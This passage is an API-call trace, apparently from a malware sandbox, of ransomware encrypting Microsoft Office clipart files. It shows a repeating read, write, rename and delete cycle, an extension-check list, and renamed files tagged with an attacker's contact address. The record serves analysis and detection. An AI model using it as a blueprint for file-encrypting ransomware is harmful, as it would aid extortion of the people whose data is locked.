Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0058.042] GetLastError () returned 0x0 [0058.042] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x1b54, lpOverlapped=0x0) returned 1 [0058.044] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1b60, lpOverlapped=0x0) returned 1 [0058.045] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0058.045] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.045] SetEndOfFile (hFile=0x1c8) returned 1 [0058.045] CloseHandle (hObject=0x1c8) returned 1 [0058.045] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.045] SetEndOfFile (hFile=0x22c) returned 1 [0058.046] CloseHandle (hObject=0x22c) returned 1 [0058.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.046] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf")) returned 1 [0058.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0058.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0058.046] lstrlenW (lpString=".doc") returned 4 [0058.046] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.046] lstrlenW (lpString=".docx") returned 5 [0058.046] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.046] lstrlenW (lpString=".pdf") returned 4 [0058.046] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.046] lstrlenW (lpString=".xls") returned 4 [0058.046] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.046] lstrlenW (lpString=".xlsx") returned 5 [0058.200] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.200] lstrlenW (lpString=".ppt") returned 4 [0058.200] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0058.200] lstrlenW (lpString=".zip") returned 4 [0058.200] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.200] lstrlenW (lpString=".rar") returned 4 [0058.200] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.200] lstrlenW (lpString=".bz2") returned 4 [0058.200] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.200] lstrlenW (lpString=".7z") returned 3 [0058.200] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0058.200] lstrlenW (lpString=".dbf") returned 4 [0058.200] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0058.200] lstrlenW (lpString=".1cd") returned 4 [0058.200] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 63 [0058.200] lstrlenW (lpString=".jpg") returned 4 [0058.200] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.223] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.223] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.223] GetLastError () returned 0x0 [0060.223] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xeb8, lpOverlapped=0x0) returned 1 [0060.225] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec0, lpOverlapped=0x0) returned 1 [0060.225] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.226] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.226] SetEndOfFile (hFile=0x1a0) returned 1 [0060.226] CloseHandle (hObject=0x1a0) returned 1 [0060.226] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.226] SetEndOfFile (hFile=0x214) returned 1 [0060.227] CloseHandle (hObject=0x214) returned 1 [0060.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.227] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf")) returned 1 [0060.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0060.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0060.227] lstrlenW (lpString=".doc") returned 4 [0060.227] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.227] lstrlenW (lpString=".docx") returned 5 [0060.227] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.227] lstrlenW (lpString=".pdf") returned 4 [0060.227] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.227] lstrlenW (lpString=".xls") returned 4 [0060.227] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.227] lstrlenW (lpString=".xlsx") returned 5 [0060.227] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.227] lstrlenW (lpString=".ppt") returned 4 [0060.228] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0060.228] lstrlenW (lpString=".zip") returned 4 [0060.228] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.228] lstrlenW (lpString=".rar") returned 4 [0060.228] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.228] lstrlenW (lpString=".bz2") returned 4 [0060.228] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.228] lstrlenW (lpString=".7z") returned 3 [0060.228] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0060.228] lstrlenW (lpString=".dbf") returned 4 [0060.228] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0060.228] lstrlenW (lpString=".1cd") returned 4 [0060.228] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 63 [0060.228] lstrlenW (lpString=".jpg") returned 4 [0060.228] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.228] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1212) returned 1 [0060.228] CloseHandle (hObject=0x214) returned 1 [0060.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf")) returned 0x20 [0060.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.229] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.229] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.229] GetLastError () returned 0x0 [0060.229] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x4bc, lpOverlapped=0x0) returned 1 [0060.230] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x4c0, lpOverlapped=0x0) returned 1 [0060.232] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.232] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.232] SetEndOfFile (hFile=0x1a0) returned 1 [0060.232] CloseHandle (hObject=0x1a0) returned 1 [0060.232] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.232] SetEndOfFile (hFile=0x214) returned 1 [0060.233] CloseHandle (hObject=0x214) returned 1 [0060.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.233] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf")) returned 1 [0060.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0060.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0060.233] lstrlenW (lpString=".doc") returned 4 [0060.233] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.233] lstrlenW (lpString=".docx") returned 5 [0060.233] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.233] lstrlenW (lpString=".pdf") returned 4 [0060.233] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.233] lstrlenW (lpString=".xls") returned 4 [0060.233] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.233] lstrlenW (lpString=".xlsx") returned 5 [0060.233] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.233] lstrlenW (lpString=".ppt") returned 4 [0060.233] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0060.234] lstrlenW (lpString=".zip") returned 4 [0060.234] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.234] lstrlenW (lpString=".rar") returned 4 [0060.234] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.234] lstrlenW (lpString=".bz2") returned 4 [0060.234] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.234] lstrlenW (lpString=".7z") returned 3 [0060.234] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0060.234] lstrlenW (lpString=".dbf") returned 4 [0060.234] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0060.234] lstrlenW (lpString=".1cd") returned 4 [0060.234] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0060.234] lstrlenW (lpString=".jpg") returned 4 [0060.234] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.235] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2052) returned 1 [0060.235] CloseHandle (hObject=0x214) returned 1 [0060.235] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf")) returned 0x20 [0060.235] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.235] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.235] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.235] GetLastError () returned 0x0 [0060.236] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x804, lpOverlapped=0x0) returned 1 [0060.237] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x810, lpOverlapped=0x0) returned 1 [0060.238] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.238] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.238] SetEndOfFile (hFile=0x1a0) returned 1 [0060.238] CloseHandle (hObject=0x1a0) returned 1 [0060.238] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.238] SetEndOfFile (hFile=0x214) returned 1 [0060.239] CloseHandle (hObject=0x214) returned 1 [0060.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf")) returned 1 [0060.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0060.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0060.239] lstrlenW (lpString=".doc") returned 4 [0060.239] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.239] lstrlenW (lpString=".docx") returned 5 [0060.239] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.239] lstrlenW (lpString=".pdf") returned 4 [0060.239] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.239] lstrlenW (lpString=".xls") returned 4 [0060.239] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.239] lstrlenW (lpString=".xlsx") returned 5 [0060.239] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.240] lstrlenW (lpString=".ppt") returned 4 [0060.240] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0060.240] lstrlenW (lpString=".zip") returned 4 [0060.240] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.240] lstrlenW (lpString=".rar") returned 4 [0060.240] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.240] lstrlenW (lpString=".bz2") returned 4 [0060.240] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.240] lstrlenW (lpString=".7z") returned 3 [0060.240] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0060.240] lstrlenW (lpString=".dbf") returned 4 [0060.240] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0060.240] lstrlenW (lpString=".1cd") returned 4 [0060.240] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 63 [0060.240] lstrlenW (lpString=".jpg") returned 4 [0060.240] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.240] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=5580) returned 1 [0060.240] CloseHandle (hObject=0x214) returned 1 [0060.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf")) returned 0x20 [0060.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0060.241] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.241] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0060.241] GetLastError () returned 0x0 [0060.241] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x15cc, lpOverlapped=0x0) returned 1 [0060.243] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x15d0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x15d0, lpOverlapped=0x0) returned 1 [0060.244] ReadFile (in: hFile=0x214, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.244] WriteFile (in: hFile=0x1a0, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.244] SetEndOfFile (hFile=0x1a0) returned 1 [0060.244] CloseHandle (hObject=0x1a0) returned 1 [0060.245] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.245] SetEndOfFile (hFile=0x214) returned 1 [0060.245] CloseHandle (hObject=0x214) returned 1 [0060.245] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.246] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf")) returned 1 [0060.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0060.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0060.246] lstrlenW (lpString=".doc") returned 4 [0060.246] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.246] lstrlenW (lpString=".docx") returned 5 [0060.246] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.246] lstrlenW (lpString=".pdf") returned 4 [0060.246] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.246] lstrlenW (lpString=".xls") returned 4 [0060.246] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.246] lstrlenW (lpString=".xlsx") returned 5 [0060.246] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.246] lstrlenW (lpString=".ppt") returned 4 [0060.246] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0060.247] lstrlenW (lpString=".zip") returned 4 [0060.247] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.247] lstrlenW (lpString=".rar") returned 4 [0060.247] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.247] lstrlenW (lpString=".bz2") returned 4 [0060.247] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.247] lstrlenW (lpString=".7z") returned 3 [0060.247] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0060.247] lstrlenW (lpString=".dbf") returned 4 [0060.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.247] 